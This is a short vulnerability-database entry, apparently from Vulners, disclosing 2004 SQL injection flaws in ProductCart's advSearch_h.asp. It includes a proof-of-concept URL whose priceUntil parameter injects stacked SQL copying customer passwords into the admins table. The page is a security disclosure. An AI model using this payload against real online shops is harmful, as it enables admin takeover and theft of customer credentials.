Lucene search

K

ProductCart 1.x2.x - advSearch_h.asp Multiple SQL Injections

๐Ÿ—“๏ธย 16 Feb 2004ย 00:00:00Reported byย Nick GudovTypeย 
exploitpack
ย exploitpack
๐Ÿ‘ย 69ย Views

ProductCart 1.x2.x has multiple vulnerabilities allowing SQL injection and data exposure risks.

Show more
Code
source: https://www.securityfocus.com/bid/9669/info
 
EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software.

http://www.example.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel
+)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&I
+DBrand=0&resultCnt=200&Submit.x=33&

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo